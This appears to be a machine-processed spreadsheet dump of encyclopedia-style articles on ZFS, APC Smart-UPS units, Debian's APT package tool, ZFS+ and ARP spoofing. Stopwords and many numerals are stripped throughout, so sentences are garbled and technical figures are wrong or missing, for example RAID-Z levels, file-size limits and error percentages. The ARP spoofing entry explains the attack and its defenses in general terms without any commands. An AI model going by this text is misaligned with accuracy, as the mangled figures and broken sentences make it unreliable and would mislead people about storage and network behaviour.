open-source versions proceeded independently, coordinated openzfs 2013. features summary examples features specific include: designed long-term storage data, indefinitely scaled datastore sizes zero data loss, high configurability. hierarchical checksumming data metadata, ensuring entire storage system verified use, confirmed correctly stored, remedied corrupt. checksums stored block's parent block, rather block itself. this contrasts many file systems checksums held) stored data data lost corrupt, checksum also likely lost incorrect. store user-specified number copies data metadata, selected types data, improve ability recover data corruption important files structures. automatic rollback recent changes file system data, circumstances, event error inconsistency. automated (usually) silent self-healing data inconsistencies write failure detected, errors data capable reconstruction. data reconstructed using following: error detection correction checksums stored block's parent block; multiple copies data (including checksums) held disk; write intentions logged slog (zil) writes occurred occur (after power failure); parity data raid/raid-z disks volumes; copies data mirrored disks volumes. native handling standard raid levels additional raid layouts ("raid-z"). raid-z levels stripe data across disks required, efficiency (many raid systems stripe indiscriminately across devices), checksumming allows rebuilding inconsistent corrupted data minimized blocks defects; native handling tiered storage caching devices, usually volume related task. because also understands file system, file-related knowledge inform, integrate optimize tiered storage handling separate device cannot; native handling snapshots backup/replication made efficient integrating volume file handling. relevant tools provided level require external scripts software utilization. native data compression deduplication, although latter largely handled memory hungry. efficient rebuilding raid arrays—a raid controller often rebuild entire disk, combine disk file knowledge limit rebuilding data actually missing corrupt, greatly speeding rebuilding; unaffected raid hardware changes affect many systems. many systems, self-contained raid hardware raid card fails, data moved another raid system, file system lack information original raid hardware, needed manage data raid array. this lead total loss data unless near-identical hardware acquired used "stepping stone". since manages raid itself, pool migrated hardware, operating system reinstalled, raid-z structures data recognized immediately accessible again. ability identify data would found cache discarded recently instead; allows reassess caching decisions light later facilitates high cache-hit levels (zfs cache rates typically 80%); alternative caching strategies used data would otherwise cause delays data handling. example, synchronous writes capable slowing storage system converted asynchronous writes written fast separate caching device, known slog (sometimes called intent log). highly tunable—many internal parameters configured optimal functionality. used high availability clusters computing, although fully designed use. data integrity major feature distinguishes file systems designed focus data integrity protecting user's data disk silent data corruption caused data degradation, power surges (voltage spikes), bugs disk firmware, phantom writes (the previous write make disk), misdirected reads/writes (the disk accesses wrong block), parity errors array server memory driver (since checksum validates data inside array), driver errors (data winds wrong buffer inside kernel), accidental overwrites (such swapping live file system), etc. 1999 study showed neither then-major widespread filesystems (such ufs, ext, xfs, jfs, ntfs), hardware raid (which issues data integrity) provided sufficient protection data corruption problems. initial research indicates protects data better earlier efforts. also faster seen replacement. within zfs, data integrity achieved using fletcher-based checksum sha-256 hash throughout file system tree. each block data checksummed checksum value saved pointer block—rather actual block itself. next, block pointer checksummed, value saved pointer. this checksumming continues file system's data hierarchy root node, also checksummed, thus creating merkle tree. in-flight data corruption phantom reads/writes (the data written/read checksums correctly actually wrong) undetectable filesystems store checksum data. stores checksum block parent block pointer entire pool self-validates.when block accessed, regardless whether data meta-data, checksum calculated compared stored checksum value "should" checksums match, data passed programming stack process asked values match, heal data storage pool provides data redundancy (such internal mirroring), assuming copy data undamaged matching checksums. optionally possible provide additional in-pool redundancy specifying copies=2 copies=3), means data stored twice three times) disk, effectively halving (or, copies=3, reducing third) storage capacity disk. additionally kinds data used manage pool stored multiple times default safety, even default copies=1 setting. copies damaged data exist reconstructed checksums parity data, copy data recreate raid recovery mechanism), recalculate checksum—ideally resulting reproduction originally expected value. data passes integrity check, system update faulty copies known-good data redundancy restored. consistency data held memory, cached data arc, checked default, expected enterprise-quality hardware error correcting ram, capability check in-memory data exists enabled using "debug flags". raid ("raid-z") able guarantee data integrity, needs multiple copies data, usually spread across multiple disks. typically achieved using either raid controller so-called "soft" raid (built file system). avoidance hardware raid controllers while work hardware raid devices, usually work efficiently greater data protection access storage devices. relies disk honest view determine moment data confirmed safely written numerous algorithms designed optimize caching, cache flushing, disk handling. disks connected system using hardware, firmware, "soft" raid, controller modifies zfs-to-disk path affect performance data integrity. third-party device performs caching presents drives single system without level view relies upon, much greater chance system perform less optimally less likely prevent failures, recover failures slowly, lose data write failure. example, hardware raid card used, able determine condition disks; determine raid array degraded rebuilding; detect data corruption; place data optimally across disks; make selective repairs; control repairs balanced ongoing use; make repairs could usually undertake. hardware raid card interfere zfs' algorithms. raid controllers also usually controller-dependent data drives prevents software raid accessing user data. case hardware raid controller failure, possible read data another compatible controller, always possible replacement available. alternate hardware raid controllers understand original manufacturer's custom data required manage restore array. unlike systems raid cards similar hardware offload resources processing enhance performance reliability, strongly recommended methods used typically reduce system's performance reliability. disks must attached raid controller, recommended minimize amount processing done controller using plain (host adapter), simple fanout card, configure card jbod mode (i.e. turn raid caching functions), allow devices attached minimal changes zfs-to-disk pathway. raid card jbod mode still interfere cache depending upon design, detach drives respond time seen many energy-efficient consumer-grade hard drives), such, require time-limited error recovery (tler)/cctl/erc-enabled drives prevent drive dropouts, cards suitable even raid functions disabled. zfs's approach: raid-z mirroring instead hardware raid, employs "soft" raid, offering raid-z (parity based like raid similar) disk mirroring (similar raid schemes highly flexible. raid-z data/parity distribution scheme like raid-5, uses dynamic stripe width: every block raid stripe, regardless blocksize, resulting every raid-z write full-stripe write. this, combined copy-on-write transactional semantics zfs, eliminates write hole error. raid-z also faster traditional raid need perform usual read-modify-write sequence.as stripes different sizes, raid-z reconstruction traverse filesystem metadata determine actual raid-z geometry. this would impossible filesystem raid array separate products, whereas becomes feasible integrated view logical physical structure data. going metadata means validate every block 256-bit checksum goes, whereas traditional raid products usually cannot this.in addition handling whole-disk failures, raid-z also detect correct silent data corruption, offering "self-healing data": reading raid-z block, compares checksum, data disks return right answer, reads parity figures disk returned data. then, repairs damaged data returns good data requestor.raid-z mirroring require special hardware: need nvram reliability, need write buffering good performance data protection. with raid-z, provides fast, reliable storage using cheap, commodity disks.there five different raid-z modes: striping (similar raid offers redundancy), raid-z1 (similar raid allows disk fail), raid-z2 (similar raid allows disks fail), raid-z3 raid configuration, allows three disks fail), mirroring (similar raid allows disk fail).the need raid-z3 arose early 2000s multi-terabyte capacity drives became common. this increase capacity—without corresponding increase throughput speeds—meant rebuilding array failed drive could "easily take weeks months" complete. during time, older disks array stressed additional workload, could result data corruption drive failure. increasing parity, raid-z3 reduces chance data loss simply increasing redundancy. resilvering scrub (array syncing integrity checking) tool equivalent fsck (the standard unix linux data checking repair tool file systems). instead, built-in scrub function regularly examines data repairs silent corruption problems. some differences are: fsck must offline filesystem, means filesystem must unmounted usable repaired, scrub designed used mounted, live filesystem, need filesystem taken offline. fsck usually checks metadata (such journal log) never checks data itself. this means, fsck, data might still match original data stored. fsck cannot always validate repair data checksums stored data (often case many file systems), checksums also corrupted unreadable. always stores checksums separately data verify, improving reliability ability scrub repair volume. also stores multiple copies data—metadata, particular, upwards copies (multiple copies disk multiple disk mirrors volume), greatly improving ability scrub detect repair extensive damage volume, compared fsck. scrub checks everything, including metadata data. effect observed comparing fsck scrub times—sometimes fsck large raid completes minutes, means metadata checked. traversing metadata data large raid takes many hours, exactly scrub does.the official recommendation sun/oracle scrub enterprise-level disks month, cheaper commodity disks week. capacity 128-bit file system, address 1.84 1019 times data 64-bit systems btrfs. maximum limits designed large never encountered practice. instance, fully populating single zpool 2128 bits data would require 3×1024 hard disk drives.some theoretical limits are: exbibytes (264 bytes): maximum size single file 248: number entries individual directory exbibytes: maximum size attribute 256: number attributes file (actually constrained number files directory) quadrillion zebibytes (2128 bytes): maximum size zpool 264: number devices zpool 264: number file systems zpool 264: number zpools system encryption with oracle solaris, encryption capability embedded pipeline. during writes, block compressed, encrypted, checksummed deduplicated, order. policy encryption dataset level datasets (file systems zvols) created. wrapping keys provided user/administrator changed time without taking file system offline. default behaviour wrapping inherited child data sets. data encryption keys randomly generated dataset creation time. only descendant datasets (snapshots clones) share data encryption keys. command switch data encryption clone time provided—this re-encrypt already existing data, instead utilising encrypted master-key mechanism. 2019 encryption feature also fully integrated openzfs 0.8.0 available debian ubuntu linux distributions. read/write efficiency automatically allocate data storage across vdevs pool (and devices vdev) generally maximises performance pool. also update write strategy take account disks added pool, added. general rule, allocates writes across vdevs based free space vdev. this ensures vdevs proportionately less data already, given writes data stored. this helps ensure pool becomes used, situation develop vdevs become full, forcing writes occur limited number devices. also means data read (and reads much frequent writes uses), different parts data read many disks possible time, giving much higher read performance. therefore, general rule, pools vdevs managed storage added, situation arise vdevs pool almost full others almost empty, make pool less efficient. other features storage devices, spares, quotas pools spares compensate failing disks. when mirroring, block devices grouped according physical chassis, filesystem continue case failure entire chassis. storage pool composition limited similar devices, consist ad-hoc, heterogeneous collections devices, seamlessly pools together, subsequently doling space diverse filesystems needed. arbitrary storage device types added existing pools expand size.the storage capacity vdevs available file system instances zpool. quota limit amount space file system instance occupy, reservation guarantee space available file system instance. caching mechanisms: arc, l2arc, transaction groups, zil, slog, special vdev uses different layers disk cache speed read write operations. ideally, data stored ram, usually expensive. therefore, data automatically cached hierarchy optimize performance versus cost; often called "hybrid storage pools". frequently accessed data stored ram, less frequently accessed data stored slower media, solid state drives (ssds). data often accessed cached left slow hard drives. data suddenly read lot, automatically move ssds ram. caching mechanisms include reads writes, case, levels caching exist, computer memory (ram) fast storage (usually solid state drives (ssds)), total four caches. number caches, cache divisions, queues also exist within zfs. example, vdev data cache, cache divided data stored user metadata used zfs, control balance these. special vdev class openzfs later, possible configure special vdev class preferentially store filesystem metadata, optionally data deduplication table (ddt), small filesystem blocks. this allows, example, create special vdev fast solid-state storage store metadata, regular file data stored spinning disks. this speeds metadata-intensive operations filesystem traversal, scrub, resilver, without expense storing entire filesystem solid-state storage. copy-on-write transactional model uses copy-on-write transactional object model. block pointers within filesystem contain 256-bit checksum 256-bit hash (currently choice fletcher-2, fletcher-4, sha-256) target block, verified block read. blocks containing active data never overwritten place; instead, block allocated, modified data written metadata blocks referencing similarly read, reallocated, written. reduce overhead process, multiple updates grouped transaction groups, (intent log) write cache used synchronous write semantics required. blocks arranged tree, checksums (see merkle signature scheme). snapshots clones advantage copy-on-write that, writes data, blocks containing data retained, allowing snapshot version file system maintained. snapshots consistent (they reflect entire data existed single point time), created extremely quickly, since data composing snapshot already stored, entire storage pool often snapshotted several times hour. they also space efficient, since unchanged data shared among file system snapshots. snapshots inherently read-only, ensuring modified creation, although relied sole means backup. entire snapshots restored also files directories within snapshots. writeable snapshots ("clones") also created, resulting independent file systems share blocks. changes made clone file systems, data blocks created reflect changes, unchanged blocks continue shared, matter many clones exist. this implementation copy-on-write principle. sending receiving snapshots file systems moved pools, also remote hosts network, send command creates stream representation file system's state. this stream either describe complete contents file system given snapshot, delta snapshots. computing delta stream efficient, size depends number blocks changed snapshots. this provides efficient strategy, e.g., synchronizing offsite backups high availability mirrors pool. dynamic striping dynamic striping across devices maximize throughput means additional devices added zpool, stripe width automatically expands include them; thus, disks pool used, balances write load across them. variable block sizes uses variable-sized blocks, default size. available features allow administrator tune maximum block size used, certain workloads perform well large blocks. data compression enabled, variable block sizes used. block compressed smaller block size, smaller size used disk less storage improve throughput (though cost increased compression decompression operations). lightweight filesystem creation zfs, filesystem manipulation within storage pool easier volume manipulation within traditional filesystem; time effort required create expand filesystem closer making directory volume manipulation systems. adaptive endianness pools associated file systems moved different platform architectures, including systems implementing different byte orders. block pointer format stores filesystem metadata endian-adaptive way; individual metadata blocks written native byte order system writing block. when reading, stored endianness match endianness system, metadata byte-swapped memory. this affect stored data; usual posix systems, files appear applications simple arrays bytes, applications creating reading data remain responsible independent underlying system's endianness. deduplication data deduplication capabilities added source repository october 2009, relevant opensolaris development packages available since december 2009 (build 128). effective deduplication require large capacity; recommendations range every storage. accurate assessment memory required deduplication made referring number unique blocks pool, number bytes disk ("core") required store record—these figures reported inbuilt commands zpool zdb. insufficient physical memory lack cache result virtual memory thrashing using deduplication, cause performance plummet, result complete memory starvation. because deduplication occurs write-time, also cpu-intensive also significantly slow system. other storage vendors modified versions achieve high data compression ratios. examples 2012 greenbytes tegile. 2014, oracle bought greenbytes deduplication replication technology.as described above, deduplication usually recommended heavy resource requirements (especially ram) impact performance (especially writing), specific circumstances system data well-suited space-saving technique. additional capabilities explicit priority deadline scheduling. claimed globally optimal sorting aggregation. multiple independent prefetch streams automatic length stride detection. parallel, constant-time directory operations. end-to-end checksumming, using kind "data integrity field", allowing data corruption detection (and recovery redundancy pool). choice hashes used, optimized speed (fletcher), standardization security (sha256) salted hashes (skein). transparent filesystem compression. supports lzjb, gzip, zstd. intelligent scrubbing resilvering (resyncing). load space usage sharing among disks pool. ditto blocks: configurable data replication filesystem, zero, extra copies requested write user data, base number copies plus metadata (according metadata importance). pool several devices, tries replicate different devices. ditto blocks primarily additional protection corrupted sectors, total disk failure. design (copy-on-write superblocks) safe using disks write cache enabled, honor write barriers. this feature provides safety performance boost compared filesystems. solaris, entire disks added pool, automatically enables write cache. this done manages discrete slices disk, since know slices managed non-write-cache safe filesystems, like ufs. freebsd implementation handle disk flushes partitions thanks geom framework, therefore suffer limitation. per-user, per-group, per-project, per-dataset quota limits. filesystem encryption since solaris express, openzfs (zol) 0.8. systems utilize encrypted disks similar effect; geli freebsd used create fully encrypted storage). pools imported read-only mode. possible recover data rolling back entire transactions time importing zpool. clustered filesystem; however, clustered available third parties. snapshots taken manually automatically. older versions stored data contain exposed full read-only file systems. they also exposed historic versions files folders used cifs (also known smb, samba file shares); known "previous versions", "vss shadow copies", "file history" windows, "apple time machine" apple devices. disks marked 'spare'. data pool automatically transparently handle disk faults activating spare disk beginning resilver data suspect disk onto needed. limitations there several limitations filesystem. limitations preventing data corruption authors 2010 study examined ability file systems detect prevent data corruption, particular focus zfs, observed effective detecting correcting data errors storage devices, assumes data "safe", prone error. study comments single flip memory causes small non-negligible percentage runs experience failure, probability committing data disk varying 3.6% (according workload)", caches pages stores copies metadata ram, holds data "dirty" cache writing disk, test made whether checksums still match data point use. much risk mitigated ways: according authors, using ram; however, authors considered adding error detection related page cache heap would allow handle certain classes error robustly. main architects zfs, matt ahrens, explains option enable checksumming data memory using zfs_debug_modify flag (zfs_flags=0x10) addresses concerns. other limitations specific capacity expansion normally achieved adding groups disks top-level vdev: simple device, raid-z, raid raid mirrored. newly written data dynamically start available vdevs. also possible expand array iteratively swapping drive array bigger drive waiting self-heal; heal time depend amount stored information, disk size. solaris update solaris 11.2, neither possible reduce number top-level vdevs pool except spares, cache, devices, otherwise reduce pool capacity. this functionality said development 2007. enhancements allow reduction vdevs development openzfs. online shrinking removing non-redundant top-level vdevs supported since solaris 11.4 released august 2018 openzfs (zol) released 2019. 2008 possible disk column raid raid raid vdev. however, raid vdev created instead added zpool. some traditional nested raid configurations, raid mirror raid groups), configurable zfs, without 3rd-party tools. vdevs composed disks files, vdevs, using default management commands. however, pool effectively creates stripe (raid across vdevs, equivalent raid raid common. reconfiguring number devices top-level vdev requires copying data offline, destroying pool, recreating pool top-level vdev configuration, except adding extra redundancy existing mirror, done time level vdevs mirrors sufficient redundancy zpool split command used remove vdev level vdev pool, creating pool identical data. iops performance storage pool suffer raid appropriately configured. this applies types raid, another. zpool consists group disks configured say, eight disks raid iops performance single disk (write speed equivalent disks, random read speed similar single disk). however, ways mitigate iops performance problem, instance ssds l2arc cache—which boost iops 100,000s. short, zpool consist several groups vdevs, vdev consisting 8–12 disks, using raid recommended create zpool single large vdev, disks, iops performance single disk, also means resilver time long (possibly weeks future large drives). resilver (repair) failed disk raid take long time unique zfs, applies types raid, another. this means large volumes take several days repair back full redundancy severe data corruption failure, time second disk failure occur, especially repair puts additional stress system whole. turn means configurations allow recovery single disk failure, raid (similar raid avoided. therefore, large disks, raid (allow disks fail) raid (allow three disks fail). raid differs conventional raid reconstructing live data metadata replacing disk, entirety disk including blank garbage blocks, means replacing member disk pool partially full take proportionally less time compared conventional raid. data recovery historically, shipped tools fsck repair damaged file systems, file system designed self-repair, long built sufficient attention design storage redundancy data. pool compromised poor hardware, inadequate design redundancy, unfortunate mishap, point unable mount pool, traditionally tools allowed end-user attempt partial salvage stored data. this threads online forums developers sometimes tried provide ad-hoc help home small scale users, facing loss data inadequate design poor system management.modern improved considerably situation time, continues removal abrupt failure caching devices longer causes pool loss. worst, loss lose recent transactions, usually store seconds' worth recent transactions. loss l2arc cache affect data.) pool unmountable, modern versions attempt identify recent consistent point pool recovered, cost losing recent changes contents. copy write means older versions data, including top-level records metadata, still exist even though superseded, pool wound back consistent state based them. older data, likely least blocks overwritten data irrecoverable, limit point, ability pool wound back. informally, tools exist probe reason unable mount pool, guide user developer manual changes required force pool mount. these include using (zfs debug) find valid importable point pool, using dtrace similar identify issue causing mount failure, manually bypassing health checks cause mount process abort, allow mounting damaged pool. march 2018, range significantly enhanced methods gradually rolled within openzfs. these include:code refactoring, detailed diagnostic debug information mount failures, simplify diagnosis fixing corrupt pool issues; ability trust distrust stored pool configuration. this particularly powerful, allows pool mounted even top-level vdevs missing faulty, level data suspect, also rewind beyond pool configuration change change connected problem. once corrupt pool mounted, readable files copied safety, turn data rebuilt even missing vdevs, using copies stored elsewhere pool. ability situation disk needed pool, accidentally removed added different pool, causing lose metadata related first pool, becomes unreadable. openzfs oracle corporation ceased public development opensolaris acquisition 2010. some developers forked last public release opensolaris illumos project. because significant advantages present zfs, ported several different platforms different features commands. coordinating development efforts avoid fragmentation, openzfs founded 2013. according matt ahrens, main architects zfs, original opensolaris code replaced openzfs community contributions 2019, making “oracle zfs” “openzfs” politically technologically incompatible. commercial open source products 2008: shipped line zfs-based 7000-series storage appliances. 2013: oracle shipped serie</t>
  </si>
  <si>
    <t>APC Smart-UPS</t>
  </si>
  <si>
    <t>smart-ups series enterprise-level uninterruptible power supplies (ups) made american power conversion (apc). most units smartslot (with exception series) accepts optional interface card providing features ranging network connectivity temperature humidity monitoring. with exception series, smart-ups units line-interactive systems, running inverters grid power unavailable. models there different variations smart-ups lineup. management software smart-ups units work apc's proprietary powerchute software available variety operating systems. free alternative powerchute free software project daemon (apcupsd), supports linux, unix microsoft windows operating systems stand alone client-server modes. legacy smart-ups (not smx, smt, surtd series also work network tools (nut), third party application, linux. software designed safely automatically shut connected computers batteries depleted. data interfaces provide management, monitoring automatic shutdown attached equipment, smart-ups models include least serial data interface (rs-232 usb), models also least smartslot expansion port, larger (and many cases older) smart-ups models supporting smartslots. availability smartslots single smart-ups unit achieved expansion modules ap9600 ap9604 models. installing add-on card smartslot provide additional features, capable beyond default serial data interface. early smartslot cards, ap9605, provide snmp functionality telnet access. ap9606 later cards interface used configure administer ups, well email-based alerting. ap9617 newer cards 10/100base-t connectivity, secure http, secure shell (ssh), radius, snmp version pcns syslog functionalities. ap9612, ap9618, ap9619 ap9631 models provide environmental monitoring used together temperature/humidity probes. ap9618 model also provides out-of-band management modem connection case 10/100 ethernet connection down. smartslot cards remain powered battery even switched off, allowing remotely cold-started even power loss situation (presuming network infrastructure still powered functioning). cards also continue work short switched either manually battery condition.beginning 2009 release models (and later surtd models), rs-232 data interface serial port db-9 connector) replaced 10-pin rj50 socket rj50-to-db-9 cable connecting protected computer's serial port (together standard interface). also, smartslot interface electrically modified backward-incompatible appropriately keyed mechanically. stated apc, "the connection arrangement denotes signalling systems." these serial smartslot interfaces microlink signalling protocol which, unlike previous protocol upslink, april 2015 publicly documented. however, using ap9620 interface card, users able support previous signalling protocol newer models. addition card makes current models backwards compatible older software built older smart-ups series. august 2013, additional option made available form firmware certain surtd models, adding publicly documented modbus signalling capability proprietary microlink protocol, allowing third-party developers support signalling control newer smart-ups series. smartslot card models late 2009, release product lines, smartslot migrated communications platform utilizing microlink protocol. both electrical mechanical (slot keying) properties smartslot make older smartslot cards incompatible current smart-ups models. example, current april 2015) smart-ups model smt1500 compatible ap9613, ap9620, ap9630 ap9631 smartslot cards.this card/slot design referred-to "network management card nmc2. however, nmc2 cards (including ap9613, ap9630 ap9631) backward compatible older smart-ups models.in 2019, released network management card nmc3 (ap9640/ap9641), superseding nmc2 cards. offers enhanced security (security chip onboard), faster communication (1000base/t) increased space data event logs. also apcupsd network tools (nut) references external links technical comparison on-line line-interactive designs white paper #79, jeffrey samstad michael hoff</t>
  </si>
  <si>
    <t>APT (software)</t>
  </si>
  <si>
    <t>advanced package tool, apt, free-software user interface works core libraries handle installation removal software debian, debian-based linux distributions. simplifies process managing software unix-like computer systems automating retrieval, configuration installation software packages, either precompiled files compiling source code. usage collection tools distributed package named apt. significant part defined library functions; also includes command-line programs dealing packages, library. three programs apt, apt-get apt-cache. they commonly used examples simple ubiquitous. package "important" priority current debian releases, therefore included default debian installation. considered front-end dpkg, friendlier older dselect front-end. while dpkg performs actions individual packages, manages relations (especially dependencies) them, well sourcing management higher-level versioning decisions (release tracking version pinning). often hailed debian's best features, debian developers attribute strict quality controls debian's policy.a major feature calls dpkg topological sorting list packages installed removed calls dpkg best possible sequence. cases, utilizes --force options dpkg. however, unable calculate avoid reason dpkg requires action forced. installing software user indicates packages installed. each package name phrased name portion package, fully qualified filename (for instance, debian system, libc6 would argument provided, libc6_1.9.6-2.deb). notably, automatically gets installs packages upon indicated package depends necessary). this original distinguishing characteristic apt-based package management systems, avoided installation failure missing dependencies, type dependency hell. another distinction retrieval packages remote repositories. uses location configuration file (/etc/apt/sources.list) locate desired packages, might available network removable storage medium, example, retrieve them, also obtain information available (but installed) packages. provides command options override decisions made apt-get's conflict resolution system. option force particular version package. this downgrade package render dependent software inoperable, user must careful. finally, apt_preferences mechanism allows user create alternative installation policy individual packages. user specify packages using posix regular expression. searches cached list packages lists dependencies must installed updated. retrieves, configures installs dependencies automatically. triggers treatment deferred actions. update, upgrade dist-upgrade usage modes apt-get facilitate updating installed packages include: update used resynchronize package index files sources. lists available packages fetched location(s) specified /etc/apt/sources.list. example, using debian archive, command retrieves scans packages.gz files, information updated packages available. upgrade used install newest versions packages currently installed system sources enumerated /etc/apt/sources.list. packages currently installed versions available retrieved upgraded; circumstances currently installed packages removed, packages already installed retrieved installed. versions currently installed packages cannot upgraded without changing install status another package left current version. full-upgrade (apt) dist-upgrade (apt-get), addition performing function upgrade, also intelligently handles changing dependencies versions packages; apt-get "smart" conflict resolution system, attempt upgrade important packages expense less important ones necessary. /etc/apt/sources.list file contains list locations retrieve desired package files. aptitude smarter dist-upgrade feature called full-upgrade. configuration files /etc/apt contains configuration folders files. apt-config configuration query program. apt-config dump shows configuration. files /etc/apt/sources.list: locations fetch packages from. /etc/apt/sources.list.d/: additional source list fragments. /etc/apt/apt.conf: configuration file. /etc/apt/apt.conf.d/: configuration file fragments. /etc/apt/preferences.d/: directory version preferences files. this would specify "pinning", i.e. preference certain packages separate source different version distribution. /var/cache/apt/archives/: storage area retrieved package files. /var/cache/apt/archives/partial/: storage area package files transit. /var/lib/apt/lists/: storage area state information package resource specified sources.list /var/lib/apt/lists/partial/: storage area state information transit. sources relies concept repositories order find software resolve dependencies. apt, repository directory containing packages along index file. this specified networked cd-rom location. august 2021, debian project keeps central repository 50,000 software packages ready download installation.any number additional repositories added apt's sources.list configuration file (/etc/apt/sources.list) queried apt. graphical front-ends often allow modifying sources.list simply (apt-setup). once package repository specified (like system installation), packages repository installed without specifying source kept up-to-date automatically. addition network repositories, compact discs storage media (usb keydrive, hard disks...) used well, using apt-cdrom adding file:/ source list file. apt-cdrom specify folder cd-rom, using option (i.e. hard disk keydrive). debian available download contain debian repositories. this allows non-networked machines upgraded. also apt-zip. problems appear several sources offer package(s). systems possibly conflicting sources pinning control sources preferred. pinning pinning feature allows users force choose particular versions packages available different versions different repositories. this allows administrators ensure packages upgraded versions conflict packages system, sufficiently tested unwelcome changes. order this, pins apt's preferences file (/etc/apt/preferences) must modified, although graphical front-ends often make pinning simpler. front-ends several front-ends exist, provide advanced installation functions intuitive interfaces. these include: synaptic, graphical user interface ubuntu software center, graphical user interface developed ubuntu project aptitude, console client ncurses-based interfaces kpackage, part adept package manager, graphical user interface (deb, rpm, bsd) packagekit, freedesktop.org frontend. gdebi, gtk-based tool sponsored ubuntu. (there also version, available ubuntu repositories gdebi-kde.) apt-cdrom, cdrom apt's list available repositories (sources.lists). necessary apt-cdrom system, cannot done hand. apt-zip, removable media, specifically flash drives. apturl, ubuntu software package enables end-user applications install single-click browser. cydia, package manager jailbroken based (ported part telesphoreo project). sileo, like cydia, package manager jailbroken based newer versions (ported electra team) gnome-apt, gtk/gnome-widget-based graphical front-end. developed havoc pennington muon discover (previous muon software center), qt-based graphical user interface hildon application manager (maemo application), maemo front-end apticron, service designed cron email notices pending updates system administrator (sysadmin). daemon, front-end runs service allow users install software policykit turn framework used ubuntu software center (along linux mint software manager). package installer, part linux.[1] apt-offline: convenient make available non-containerized change debian-type linux installation without using direct internet connection. however, temporary direct connection required, install apt-offline relevant types linux, ppa's sources-list.apt front-ends can: search packages; upgrade packages; install remove packages upgrade whole system release.apt front-ends list dependencies packages installed upgraded, administrator packages recommended suggested newly installed packages installed too, automatically install dependencies perform operations system removing obsolete files packages. history original effort apt-get program dselect replacement project known codename deity. this project commissioned 1997 brian white, debian release manager time. first functional version apt-get called dpkg-get intended test program core library functions would underpin user interface (ui).much original development done internet relay chat (irc), records lost. 'deity creation team' mailing list archives include major highlights. 'deity' name abandoned official name project concerns religious nature name. name eventually decided considerable internal public discussion. ultimately name proposed irc, accepted finalized mailing lists.apt introduced 1998 original test builds circulated irc. first debian version included debian 2.1, released march 1999.in original goal deity project replacing dselect user interface failure. work user interface portion project abandoned (the user interface directories removed concurrent versions system) first public release apt-get. response dselect method command line utility great positive development efforts focused maintaining improving tool. much later several independent people built user interfaces libapt-pkg. eventually, team picked project, began build features released version introduced secure feature, using strong cryptographic signing authenticate package repositories. variants originally designed front-end dpkg work debian's .deb packages. version modified also work package manager system released apt-rpm. fink project ported package management tasks, also available opensolaris. apt-file apt-file command, packaged separately apt, find package includes specific file, list files included package remote repositories. also alien appstream aptoncd guix wajig references external links apt(8) debian maintenance commands manual howto tutorial chapter debian package management debian reference</t>
  </si>
  <si>
    <t>ZFS+</t>
  </si>
  <si>
    <t>zfs+ combined file system logical volume manager software subsystem initially released common development distribution license (cddl). based zfs, originally developed microsystems, proprietary data deduplication features added greenbytes subsequently made proprietary storage system product. greenbytes originally owned trademark zfs+, confused trademark currently held oracle corporation. (greenbytes owned oracle.) products greenbytes created storage appliance, called cypress filer, originally based upon microsystems x86-64-based fire x4500 platform, bundled zfs+ implementation value-add technology. greenbytes claimed zfs+ technology could reduce storage power consumption 50%. 2009, greenbytes relaunched technology name, gbfs (greenbytes file system). references</t>
  </si>
  <si>
    <t>ARP spoofing</t>
  </si>
  <si>
    <t>computer networking, spoofing, cache poisoning, poison routing, technique attacker sends (spoofed) address resolution protocol (arp) messages onto local area network. generally, associate attacker's address address another host, default gateway, causing traffic meant address sent attacker instead. spoofing allow attacker intercept data frames network, modify traffic, stop traffic. often attack used opening attacks, denial service, middle, session hijacking attacks.the attack used networks arp, requires attacker direct access local network segment attacked. vulnerabilities address resolution protocol (arp) widely used communications protocol resolving internet layer addresses link layer addresses. when internet protocol (ip) datagram sent host another local area network, destination address must resolved address transmission data link layer. when another host's address known, address needed, broadcast packet sent local network. this packet known request. destination machine request responds reply contains address ip.arp stateless protocol. network hosts automatically cache replies receive, regardless whether network hosts requested them. even entries expired overwritten reply packet received. there method protocol host authenticate peer packet originated. this behavior vulnerability allows spoofing occur. attack anatomy basic principle behind spoofing exploit lack authentication protocol sending spoofed messages onto lan. spoofing attacks compromised host lan, attacker's machine connected directly target lan. attacker using spoofing disguise host transmission data network users. then users would know attacker real host network.generally, goal attack associate attacker's host address address target host, traffic meant target host sent attacker's host. attacker choose inspect packets (spying), forwarding traffic actual default destination avoid discovery, modify data forwarding (man-in-the-middle attack), launch denial-of-service attack causing packets network dropped. defenses static entries simplest form certification static, read-only entries critical services cache host. address-to-mac address mappings local cache statically entered. hosts need transmit requests entries exist. while static entries provide security spoofing, result maintenance efforts address mappings systems network must generated distributed. this scale large network since mapping pair machines resulting n2-n entries configured machines present; machine must entry every machine network; entries machines. detection prevention software software detects spoofing generally relies form certification cross-checking responses. uncertified responses blocked. these techniques integrated dhcp server dynamic static addresses certified. this capability implemented individual hosts integrated ethernet switches network equipment. existence multiple addresses associated single address indicate spoof attack, although legitimate uses configuration. passive approach device listens replies network, sends notification email entry changes.antiarp also provides windows-based spoofing prevention kernel level. arpstar linux module kernel linksys routers drops invalid packets violate mapping, contains option repoison/heal. some virtualized environments also provide security mechanisms prevent spoofing guests running host.additionally ethernet adapters provide vlan anti-spoofing features.openbsd watches passively hosts impersonating local host notifies case attempt overwrite permanent entry security operating systems react differently. linux ignores unsolicited replies, but, hand, uses responses requests machines update cache. solaris accepts updates entries timeout. microsoft windows, behavior cache configured several registry entries hkey_local_machine\system\currentcontrolset\services\tcpip\parameters, arpcachelife, arpcacheminreferencelife, arpuseethersnap, arptrsingleroute, arpalwayssourceroute, arpretrycount. legitimate usage techniques used spoofing also used implement redundancy network services. example, software allows backup server issue gratuitous request order take defective server transparently offer redundancy. circle cujo companies commercialized products centered around strategy. spoofing often used developers debug traffic hosts switch use: host host communicating ethernet switch, traffic would normally invisible third monitoring host developer configures address address also configures forward packets. monitor traffic, exactly man-in-the-middle attack. tools defense spoofing some tools used carry spoofing attacks: also cache poisoning spoofing address spoofing spoofing proxy references external links stephanie reigns (2014-10-07). "clearing cache linux". coders eye. retrieved 2018-03-05.</t>
  </si>
  <si>
    <t>ARPANET encryption devices</t>
  </si>
  <si>
